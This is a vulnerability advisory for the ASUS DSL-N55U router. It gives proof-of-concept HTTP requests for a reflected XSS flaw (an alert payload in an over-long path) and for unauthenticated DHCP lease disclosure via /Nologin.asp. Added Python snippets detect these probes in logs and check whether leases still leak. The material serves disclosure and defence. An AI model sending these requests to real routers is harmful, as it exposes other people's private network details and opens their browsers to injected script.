SEC Consult Vulnerability Lab Security Advisory < 20160624-0 >
=======================================================================
title: XSS and information disclosure vulnerability
product: ASUS DSL-N55U router
vulnerable version: 3.0.0.4.376_2736
fixed version: 3.0.0.4_380_3679
CVE number: requested
impact: Medium
homepage: https://www.asus.com/
found: 2016-04-12
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
http://ift.tt/1mGHMNR
=======================================================================
Vendor description:
-------------------
"ASUS has long been at the forefront of this growth and while the company
started life as a humble motherboard manufacturer with just a handful of
employees, it is now the leading technology company in Taiwan with over
12,500 employees worldwide. ASUS makes products in almost every area of
Information Technology too, including PC components, peripherals,
notebooks, tablets, servers and smartphones."
Source: http://ift.tt/28K4VTV
Business recommendation:
------------------------
SEC Consult recommends not to use this device until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.
Vulnerability overview/description:
-----------------------------------
1. Reflected Cross-Site Scripting
The vulnerability exists in the "httpd" binary of the ASUS DSL-N55U firmware.
If the requested web path is longer than 50 characters, httpd redirects the user to
the cloud_sync.asp page with the web path as the value of a GET parameter.
Due to the lack of input validation on that value, an attacker can insert malicious
JavaScript code that is executed in the victim's browser context.
No authentication is required.
2. Remote DHCP Information Disclosure
An unauthenticated attacker connecting to the router's WAN IP address can obtain
DHCP lease information, including the hostnames and private IP addresses of the
local machines connected to the router.
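To give a network defender something to alert on for the two issues above, here is an added example (not part of the advisory) that scans access-log lines in Common Log Format, assumed to come from a proxy or IDS in front of the router, for over-long paths carrying JavaScript delimiters (the 50-character redirect trigger) and for requests to Nologin.asp from outside the LAN. The log lines, source addresses and RFC 1918 "LAN" definition are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote

# Constructed Common Log Format lines, assumed to come from a proxy or IDS in
# front of the router (the router's own httpd is not known to log this way).
PROBE_PATH = "/" + "1" * 40 + "'+alert('XSS')+'"   # 57 chars, shape of the PoC
SAMPLE_LOG = f"""\
203.0.113.7 - - [12/Apr/2016:09:04:48 +0000] "GET {PROBE_PATH} HTTP/1.1" 200 512
203.0.113.7 - - [12/Apr/2016:09:05:01 +0000] "GET /Nologin.asp HTTP/1.1" 200 2048
192.168.1.10 - - [12/Apr/2016:09:06:12 +0000] "GET /index.asp HTTP/1.1" 200 8192
"""
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d{3}')

# Advisory trigger: paths over 50 characters are reflected into cloud_sync.asp
# unvalidated, so an over-long path carrying JS string/tag delimiters is a probe.
LONG_PATH_LIMIT = 50
JS_BREAKOUT = re.compile(r"""['"<>()]""")
# "WAN side" is approximated as any source outside the RFC 1918 LAN ranges.
LAN_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_lan(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in LAN_NETS)

def classify(line: str) -> list:
    """Return the findings for one log line (empty when benign or unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path = unquote(m.group("path"))
    findings = []
    if len(path) > LONG_PATH_LIMIT and JS_BREAKOUT.search(path):
        findings.append("xss-probe")
    # Nologin.asp hands out DHCP leases without authentication; a hit from
    # outside the LAN is the WAN-side disclosure case in the advisory.
    if path.split("?", 1)[0].lower() == "/nologin.asp" and not is_lan(m.group("src")):
        findings.append("dhcp-disclosure-wan")
    return findings

def scan(log: str) -> dict:
    """Group findings by source address, skipping benign lines."""
    results = {}
    for line in log.splitlines():
        findings = classify(line)
        if findings:
            results.setdefault(LOG_RE.match(line).group("src"), []).extend(findings)
    return results
```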
Proof of concept:
-----------------
1. Reflected Cross-Site Scripting
HTTP Request:
GET /111111111111111111111111111111111111111'+alert('XSS')+' HTTP/1.1
Host:
HTTP Response:
HTTP/1.0 200 OK
Server: httpd
Date: Tue, 12 Apr 2016 09:04:48 GMT
Content-Type: text/html
Connection: close
2. Remote DHCP Information Disclosure
HTTP Request:
GET /Nologin.asp HTTP/1.1
Host:
HTTP Response:
HTTP/1.0 200 Ok
Server: httpd
[...]
var dhcpLeaseInfo = [['', ''],['',
''],['', '']];;
function initial(){
[...]
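For verifying after the firmware upgrade whether an unauthenticated /Nologin.asp response still exposes leases, here is an added example (not from the advisory or from ASUS) that parses the dhcpLeaseInfo literal shown above. The sample bodies are constructed, and the empty-array "clean" form is an assumption about what a non-disclosing response looks like.

```python
import re

# Constructed response bodies (not captured from a device).  LEAKING_BODY has the
# shape of the advisory's /Nologin.asp excerpt with lease values filled in;
# CLEAN_BODY is an assumed non-disclosing form with an empty array.
LEAKING_BODY = """\
<script>
var dhcpLeaseInfo = [['laptop-01', '192.168.1.10'],['printer',
'192.168.1.20'],['nas', '192.168.1.30']];;
function initial(){
</script>
"""
CLEAN_BODY = "<script>\nvar dhcpLeaseInfo = [];\nfunction initial(){\n</script>\n"

# The array literal ends at the first ']' that is followed by ';' (the page has
# a doubled ';;'); inner pairs are two single-quoted strings.
ARRAY_RE = re.compile(r"var\s+dhcpLeaseInfo\s*=\s*(\[.*?\])\s*;", re.DOTALL)
PAIR_RE = re.compile(r"\[\s*'([^']*)'\s*,\s*'([^']*)'\s*\]")

def extract_leases(body: str):
    """Return (hostname, ip) pairs from the dhcpLeaseInfo literal.

    None means no assignment was found at all (e.g. a login page instead), so
    a missing variable is distinguishable from an empty list.  Blank pairs such
    as the redacted ['', ''] in the advisory excerpt are not counted.
    """
    m = ARRAY_RE.search(body)
    if m is None:
        return None
    return [(host, ip) for host, ip in PAIR_RE.findall(m.group(1)) if host or ip]

def discloses_leases(body: str) -> bool:
    """True when an unauthenticated response still carries real lease entries."""
    return bool(extract_leases(body))
```

Feed discloses_leases() the body of an unauthenticated request to your own router's /Nologin.asp from the WAN side; a True result means the disclosure is still present after the upgrade.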
Vulnerable / tested versions:
-----------------------------
The following firmware version has been tested; it was the most recent version
at the time of discovery:
- 3.0.0.4.376_2736 (2015/01/19 update)
URL: http://ift.tt/28PK7GH
Vendor contact timeline:
------------------------
2016-06-02: Contacting vendor through privacy (at) asus (dot) com and netadmin (at) asus.com (dot) tw.
2016-06-03: ASUS responds and establishes encrypted communication channel.
2016-06-06: Sending PGP encrypted security advisory to ASUS.
2016-06-20: Vulnerability is fixed in beta firmware.
2016-06-24: Public release of the advisory.
Solution:
---------
Upgrade to firmware version 3.0.0.4_380_3679 or later.
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
http://ift.tt/1UwAo9B
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested in working with the experts of SEC Consult?
Send us your application http://ift.tt/1X0nW5w
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices http://ift.tt/1UwzJF7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: http://ift.tt/1mGHMNR
Blog: http://ift.tt/1OrTVF9
Twitter: https://twitter.com/sec_consult
EOF Pichaya Morimoto / @2016